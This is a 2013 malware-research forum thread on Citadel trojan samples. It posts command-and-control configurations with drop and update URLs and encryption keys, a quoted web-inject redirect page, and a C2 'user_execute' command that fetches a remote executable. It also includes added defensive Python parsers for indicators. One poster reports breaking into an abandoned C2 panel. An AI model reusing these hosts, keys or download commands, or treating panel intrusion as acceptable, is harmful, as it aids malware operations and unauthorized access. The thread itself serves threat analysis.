Citadel (Zeus clone)

Forum for analysis and discussion about malware.

Re: Citadel (Zeus clone)

Postby Xylitol » Tue Dec 17, 2013 2:30 pm

Citadel, almost no trigger, just Facebook
Code:
Drop: hxtp://dargs.su/citadm/vorota.php
Update: hxtp://dargs.su/citadm/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: C5 88 D5 B3 FC A8 1A 41 50 15 C6 5C A1 8A DA 60

MitB panel anyway, but it seems dead > http://jsunpack.jeek.org/?report=e3544e ... 9ab55e8000
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Citadel (Zeus clone)

Postby Xylitol » Tue Dec 17, 2013 2:52 pm

Targeting Spain, Canada, America, PayPal, United Kingdom
Code:
Drop: hxtp://secctor.ru/image/gate.php
Update: hxtp://secctor.ru/image/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: E6 C0 56 0D 4D 74 8C 9A 49 21 DD DD 1B 92 CF 4B

https://zeustracker.abuse.ch/monitor.ph ... secctor.ru
https://www.virustotal.com/en/file/4a9e ... /analysis/

Re: Citadel (Zeus clone)

Postby Xylitol » Sun Dec 22, 2013 3:40 pm

Targeting Italy
Code:
Drop: hxtp://109.235.50.169:53811/pr/2.php
Update: hxtp://109.235.50.169:53811/pr/1.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 70 B9 17 DE D7 62 9C 00 45 80 99 DA FE 67 0E 88

https://zeustracker.abuse.ch/monitor.ph ... 235.50.169
https://www.virustotal.com/en/file/41d0 ... /analysis/
WebInj:
Code:
https://www.ddxalee.com/expupkin/pp/admin/


Re: Citadel (Zeus clone)

Postby Xylitol » Sun Dec 22, 2013 5:55 pm

Targeting nothing.
Code:
Drop: hxtp://91.229.78.150/cit/gate.php
Update: hxtp://91.229.78.150/cit/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: D7 A9 0A E3 C3 21 EF 59 73 D9 2D 9C 77 44 F3 CB

https://zeustracker.abuse.ch/monitor.ph ... 229.78.150
https://www.virustotal.com/en/file/7dbe ... /analysis/
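
The four dumps above all use the same four-line format (Drop, Update, Login key, Key), and all four print the same login key. An added example, not Xylitol's tooling and not part of the original thread: a small Python parser that turns dumps in that format into structured records, pulls out host:port for blocklisting (refanging the hxtp:// defanging only for parsing), validates the field shapes visible in the dumps (32 hex digits for the login key, 16 bytes for the key) and groups C2 hosts by login key. The sample input is the first two dumps from this thread, pasted inline so the script runs offline; nothing about the meaning of the 16-byte key beyond its length is assumed here.

```python
"""Turn the Drop/Update/Login key/Key dumps posted in this thread into structured IOCs."""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Sample input in the exact line format of the dumps above; the values are the
# first two dumps in the thread (dargs.su and secctor.ru), embedded so the
# parser runs offline.
SAMPLE_DUMPS = """\
Drop: hxtp://dargs.su/citadm/vorota.php
Update: hxtp://dargs.su/citadm/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: C5 88 D5 B3 FC A8 1A 41 50 15 C6 5C A1 8A DA 60

Drop: hxtp://secctor.ru/image/gate.php
Update: hxtp://secctor.ru/image/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: E6 C0 56 0D 4D 74 8C 9A 49 21 DD DD 1B 92 CF 4B
"""


def refang(url: str) -> str:
    """Undo the hxtp:// (or hxxp://) defanging used in the thread, for parsing only."""
    return re.sub(r'^hx+tp', 'http', url, flags=re.I)


@dataclass
class CitadelConfig:
    drop_url: str        # gate the bot posts stolen data to ("Drop" line)
    update_url: str      # URL the bot fetches its update from ("Update" line, before '|')
    update_params: dict  # the part after '|' in the Update line, e.g. {'file': 'soft.exe'}
    login_key: str       # 32 hex digits, as printed in the dump
    key: bytes           # the 16-byte "Key" line as raw bytes

    def netlocs(self):
        """host[:port] of every C2 URL, refanged and with the port kept (for a blocklist)."""
        return sorted({urlsplit(refang(u)).netloc for u in (self.drop_url, self.update_url)})


def _build(fields: dict) -> CitadelConfig:
    missing = {'drop', 'update', 'login key', 'key'} - set(fields)
    if missing:
        raise ValueError(f'dump is missing {sorted(missing)}')
    update_url, _, raw_params = fields['update'].partition('|')
    params = dict(p.split('=', 1) for p in raw_params.split('&') if '=' in p)
    login_key = fields['login key']
    if not re.fullmatch(r'[0-9A-Fa-f]{32}', login_key):
        raise ValueError(f'login key is not 32 hex digits: {login_key!r}')
    key = bytes.fromhex(fields['key'])  # fromhex skips the spaces between bytes
    if len(key) != 16:
        raise ValueError(f'expected a 16-byte key, got {len(key)} bytes')
    return CitadelConfig(fields['drop'], update_url.strip(), params, login_key.upper(), key)


def parse_dumps(text: str) -> list:
    """Parse one or more blank-line-separated dumps into CitadelConfig records."""
    configs, fields = [], {}
    for line in text.splitlines() + ['']:  # trailing sentinel flushes the last block
        line = line.strip()
        if not line:
            if fields:
                configs.append(_build(fields))
                fields = {}
            continue
        label, sep, value = line.partition(':')  # first ':' only; URLs contain more
        if not sep:
            raise ValueError(f'unexpected line: {line!r}')
        fields[label.strip().lower()] = value.strip()
    return configs


def hosts_by_login_key(configs) -> dict:
    """Map each login key to the sorted C2 host:port values that use it."""
    groups = defaultdict(set)
    for c in configs:
        groups[c.login_key].update(c.netlocs())
    return {k: sorted(v) for k, v in groups.items()}


if __name__ == '__main__':
    cfgs = parse_dumps(SAMPLE_DUMPS)
    for c in cfgs:
        print(c.netlocs(), c.login_key, c.key.hex())
    print(hosts_by_login_key(cfgs))
```

Feeding the other dumps on this page through the same parser keeps the non-standard port of the 109.235.50.169:53811 gate in the netloc, which is the form a blocklist needs.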

Re: Citadel (Zeus clone)

Postby teddybear » Tue Dec 24, 2013 6:40 pm

Xylitol wrote: Citadel, almost no trigger, just Facebook
Code:
Drop: hxtp://dargs.su/citadm/vorota.php
Update: hxtp://dargs.su/citadm/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: C5 88 D5 B3 FC A8 1A 41 50 15 C6 5C A1 8A DA 60

MitB panel anyway, but it seems dead > http://jsunpack.jeek.org/?report=e3544e ... 9ab55e8000


Alive on the same value33g[.]com IP (208[.]91[.]197[.]241) there's now:
Code:
http://searchresultsguide.com/


No more on https but injected JS is working (tested a few minutes ago):
Code:
http://searchresultsguide.com/nccvbv/gate.php?action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED


Returns the following page (sorry for removing almost everything, but you can always try for yourself):
Code:
<!--
   top.location="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED";
   /*
-->
<script type="text/javascript">
   <!--
   dimensionUpdated = 0;
   function applyFrameKiller()
   {
      if(window.top != self)
      {
         cHeight = 0;
         if( typeof( window.innerHeight ) != 'undefined' ) {
         //Non-IE
         cHeight = window.innerHeight;
         dimensionUpdated = 1;
         } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )  ) {
         //IE 6+ in 'standards compliant mode'
         cHeight = document.documentElement.clientHeight;
         dimensionUpdated = 1;
         } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
         //IE 4 compatible
         cHeight = document.body.clientHeight;
         dimensionUpdated = 1;
         }
         if( cHeight <= 250 && dimensionUpdated == 1)
         {
            window.top.location = "http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED";
         }
      }
   }

   applyFrameKiller();
   // -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
   <frame src="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED">
</frameset>
<noframes>
   <body bgcolor="#ffffff" text="#000000">
   <a href="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED">Click here to proceed</a>.
   </body>
</noframes><!--
*/
-->


Then I guess what follows is some shitty ads.
teddybear
 
Posts: 16
Joined: Tue Sep 24, 2013 11:06 am
Reputation point: 2
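
The gate.php response quoted above carries its destination four times: in a commented-out top.location, in the frame-killer script (which only fires when the page is framed and shorter than 250px), in the frame src and in the noframes link. An added example, not teddybear's code and not the operators': a Python extractor that pulls every redirect target out of such a response and reports which query parameters only the script-driven redirects carry. It runs on a constructed stand-in with the same structure as the quoted page, with the tracking values replaced by REDACTED exactly as in the post; the meta-refresh handling is an addition for pages this thread does not show.

```python
"""Enumerate redirect destinations in a gate.php-style response and compare their parameters."""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the response quoted above: same structure
# (commented-out top.location, frame-killer script, frameset, noframes link),
# with the tracking values replaced by REDACTED just as in the post.
SAMPLE_RESPONSE = """<!--
   top.location="http://searchresultsguide.com/?fp=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&ssid=REDACTED";
   /*
-->
<script type="text/javascript">
   <!--
   function applyFrameKiller() {
      if(window.top != self) {
         if( cHeight <= 250 && dimensionUpdated == 1) {
            window.top.location = "http://searchresultsguide.com/?fp=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&ssid=REDACTED";
         }
      }
   }
   applyFrameKiller();
   // -->
</script><frameset rows="100%,*">
   <frame src="http://searchresultsguide.com/?fp=REDACTED&action=check_uid&site=facebook&uid=REDACTED&ssid=REDACTED">
</frameset>
<noframes>
   <a href="http://searchresultsguide.com/?fp=REDACTED&action=check_uid&site=facebook&uid=REDACTED&ssid=REDACTED">Click here to proceed</a>.
</noframes><!--
*/
-->
"""

# JS location assignments: top.location, window.top.location, self.location, ...
LOCATION_RE = re.compile(
    r'''(?:window\.top|top|window|self|document)\.location(?:\.href)?\s*=\s*["']([^"']+)["']''')


class RedirectExtractor(HTMLParser):
    """Collect (source, url) pairs from script text, HTML comments, frames, links and meta refresh."""

    def __init__(self):
        super().__init__()
        self.redirects = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'script':
            self._in_script = True
        elif tag in ('frame', 'iframe') and a.get('src'):
            self.redirects.append((tag + '.src', a['src']))
        elif tag == 'a' and a.get('href'):
            self.redirects.append(('a.href', a['href']))
        elif tag == 'meta' and (a.get('http-equiv') or '').lower() == 'refresh':
            m = re.search(r'url\s*=\s*(\S+)', a.get('content') or '', re.I)
            if m:
                self.redirects.append(('meta.refresh', m.group(1)))

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._scan_js('script', data)

    def handle_comment(self, data):
        # The quoted response hides a top.location assignment inside an HTML
        # comment; a browser never runs it, but it still names the destination.
        self._scan_js('comment', data)

    def _scan_js(self, source, text):
        for m in LOCATION_RE.finditer(text):
            self.redirects.append((source, m.group(1)))


def extract_redirects(html: str) -> list:
    p = RedirectExtractor()
    p.feed(html)
    p.close()
    return p.redirects


def summarize(html: str) -> list:
    """One row per destination: where it came from, host, path and sorted query parameter names."""
    rows = []
    for source, url in extract_redirects(html):
        parts = urlsplit(url)
        rows.append({'source': source, 'host': parts.hostname, 'path': parts.path,
                     'params': sorted(parse_qs(parts.query))})
    return rows


def params_only_in_script(html: str) -> list:
    """Query parameters present on script-driven redirects but absent from the frame/link fallbacks."""
    rows = summarize(html)
    scripted = set().union(*(set(r['params']) for r in rows if r['source'] in ('script', 'comment')))
    static = set().union(*(set(r['params']) for r in rows if r['source'] not in ('script', 'comment')))
    return sorted(scripted - static)


if __name__ == '__main__':
    for row in summarize(SAMPLE_RESPONSE):
        print(row)
    print('script-only params:', params_only_in_script(SAMPLE_RESPONSE))
```

Run against the stand-in, every destination is the same host and path; the only difference is that the script-driven redirects add cifr=1, which the frame src and the noframes link do not carry, matching what the quoted page shows.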

Re: Citadel (Zeus clone)

Postby Xylitol » Sat Dec 28, 2013 10:25 am

Some Citadel, see comments on VT for more info.

https://www.virustotal.com/en/file/81b4 ... /analysis/
https://www.virustotal.com/en/file/8b55 ... /analysis/
https://www.virustotal.com/en/file/04c6 ... /analysis/
https://www.virustotal.com/en/file/9756 ... /analysis/
https://www.virustotal.com/en/file/b1c3 ... /analysis/
https://www.virustotal.com/en/file/bb9d ... /analysis/
https://www.virustotal.com/en/file/c66d ... /analysis/
https://www.virustotal.com/en/file/6aab ... /analysis/
https://www.virustotal.com/en/file/8f14 ... /analysis/
https://www.virustotal.com/en/file/6046 ... /analysis/
https://www.virustotal.com/en/file/49e3 ... /analysis/
https://www.virustotal.com/en/file/70c1 ... /analysis/
https://www.virustotal.com/en/file/5f97 ... /analysis/
https://www.virustotal.com/en/file/ab79 ... /analysis/
https://www.virustotal.com/en/file/5089 ... /analysis/
https://www.virustotal.com/en/file/2400 ... /analysis/
https://www.virustotal.com/en/file/4a9e ... /analysis/
https://www.virustotal.com/en/file/4446 ... /analysis/
https://www.virustotal.com/en/file/42ec ... /analysis/
https://www.virustotal.com/en/file/e3ca ... /analysis/
https://www.virustotal.com/en/file/828f ... /analysis/
https://www.virustotal.com/en/file/2f25 ... 387204495/
https://www.virustotal.com/en/file/6233 ... /analysis/
https://www.virustotal.com/en/file/359b ... /analysis/
https://www.virustotal.com/en/file/255c ... /analysis/
https://www.virustotal.com/en/file/6ef4 ... /analysis/
https://www.virustotal.com/en/file/71ea ... /analysis/
https://www.virustotal.com/en/file/c2ca ... /analysis/
https://www.virustotal.com/en/file/20ca ... /analysis/
https://www.virustotal.com/en/file/be0f ... /analysis/
https://www.virustotal.com/en/file/753c ... /analysis/
https://www.virustotal.com/en/file/fe12 ... /analysis/
https://www.virustotal.com/en/file/eed7 ... /analysis/
https://www.virustotal.com/en/file/fd71 ... /analysis/
https://www.virustotal.com/en/file/4c8c ... /analysis/
https://www.virustotal.com/en/file/7810 ... /analysis/
https://www.virustotal.com/en/file/5da3 ... /analysis/
https://www.virustotal.com/en/file/fd71 ... /analysis/
https://www.virustotal.com/en/file/a687 ... /analysis/
https://www.virustotal.com/en/file/3e7f ... /analysis/
https://www.virustotal.com/en/file/b70f ... /analysis/
https://www.virustotal.com/en/file/8a59 ... /analysis/
https://www.virustotal.com/en/file/4c6d ... 387473145/
https://www.virustotal.com/en/file/7ca9 ... /analysis/
https://www.virustotal.com/en/file/5c03 ... /analysis/
https://www.virustotal.com/en/file/710b ... /analysis/
https://www.virustotal.com/en/file/4569 ... /analysis/
https://www.virustotal.com/en/file/e675 ... /analysis/
https://www.virustotal.com/en/file/7dbe ... /analysis/
https://www.virustotal.com/en/file/41d0 ... /analysis/
https://www.virustotal.com/en/file/a37b ... /analysis/
https://www.virustotal.com/en/file/7791 ... /analysis/
https://www.virustotal.com/en/file/d1d8 ... /analysis/
https://www.virustotal.com/en/file/ce6f ... /analysis/
https://www.virustotal.com/en/file/b620 ... /analysis/
https://www.virustotal.com/en/file/0ffc ... /analysis/
https://www.virustotal.com/en/file/1edc ... /analysis/
https://www.virustotal.com/en/file/a317 ... /analysis/
https://www.virustotal.com/en/file/60bc ... /analysis/
https://www.virustotal.com/en/file/e5d5 ... /analysis/
https://www.virustotal.com/en/file/a19c ... /analysis/

cbcs.exe

Postby g4m372 » Sun Dec 29, 2013 10:02 am

Hi, does any of you have cbcs.exe? I am a little bit under time pressure; I need to prepare a demo for January and would like to include the VNC stuff.

http://laboratoriomalware.blogspot.de/2 ... ndows.html
g4m372
 
Posts: 3
Joined: Fri Aug 16, 2013 2:05 pm
Reputation point: 0

Re: Citadel (Zeus clone)

Postby Xylitol » Sun Dec 29, 2013 1:06 pm

One-year-old article and no hash provided; it would be hard to get it :D
This one maybe: https://www.virustotal.com/en/file/b487 ... 388323320/
I got it from http://vxvault.siri-urz.net/ViriList.ph ... 8e4b786d1e

Re: Citadel (Zeus clone)

Postby patriq » Sun Dec 29, 2013 10:20 pm

Worked on a Citadel C&C from ZeuS Tracker

Code:
Panel:
http://173.242.112.135/office/obi/server/cp.php?m=login


Script was running:

user_execute hxtp://142.0.36.226/office/nh.exe

Code:
nh.exe - cf2cfc5354b62dc0d9bf42a0a3841437 (attached)
I think it's a Citadel? Some AV vendors say zBot, etc.


https://malwr.com/analysis/MzVlOWJjYzNhNjQzNDhhYTk4YjE0NWFiMGMwYzZlYzQ/
https://www.virustotal.com/en/file/cf448a476158abe3ff0b7e0cb8eef6d076f6028d264730750861568f488159a0/analysis/1388343199/

I broke into the panel this weekend. Made a post about it since the server has been abandoned.

http://protectyournet.blogspot.com/2013/12/citadel-c-hosted-on-173242112135.html
Last edited by Xylitol on Sun Dec 29, 2013 10:32 pm, edited 1 time in total.
Reason: link obfuscation
patriq
 
Posts: 109
Joined: Fri Jun 28, 2013 8:11 pm
Reputation point: 22

Re: Citadel (Zeus clone)

Postby g4m372 » Mon Dec 30, 2013 12:54 pm

Xylitol wrote: One-year-old article and no hash provided; it would be hard to get it :D
This one maybe: https://www.virustotal.com/en/file/b487 ... 388323320/
I got it from http://vxvault.siri-urz.net/ViriList.ph ... 8e4b786d1e


but the first try looks good (at least in my sandbox) ... THX A LOT!

# cat output.txt
Citadel Backconnect Server 1.3.5.1.
Build time: 22:04:47 16.10.2012 GMT.

Usage: cbcs.exe <command> -<switch 1> -<switch N>

listen Start a backconnect server for one bot.
-nologo Suppresses display of sign-on banner.
-ipv4 Listen on IPv4 port.
-ipv6 Listen on IPv6 port.
-bp:[port] TCP port for accepting a connection from bot.
-cp:[port] TCP port for accepting a connection from client.
